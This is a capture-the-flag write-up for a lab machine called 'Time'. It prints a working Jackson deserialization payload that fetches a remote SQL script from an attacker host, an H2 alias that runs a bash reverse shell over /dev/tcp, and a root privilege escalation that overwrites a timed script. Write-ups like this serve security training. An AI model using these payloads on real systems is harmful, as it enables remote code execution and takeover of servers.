Time

To get in the system we abuse a well known Java deserialization vulnerability on Jackson-library. In the box there is a JSON parser which accepts user-input and doesn't sanitize it properly. Jackson has some built in blacklist and since you can only deserialize classes that exist on the application finding the correct Jackson gadget was pretty time consuming. After some trial and error we finally found a good gadget: ch.qos.logback.core.db.DriverManagerConnectionSource

To exploit this we send the following payload:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.50:8000/inject.sql'"  } ]

The given payload allows ups to run a remote SQL-script which we inject with a system call to give us a reverse shell on port 1337. The file inject.sql contains:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.50/1337 0>&1')

After getting in and enumerating a little we found out that a script is executing on server by root every 10 second or something. the script location is /usr/bin/timer_backup.sh and is owned by the current user we have shell on. So we can just edit the file and root will execute what ever that file contains. Easiest way to get the flag is to just run the following command:

echo 'cat /root/root.txt > /home/pericles/root.txt' > /usr/bin/timer_backup.sh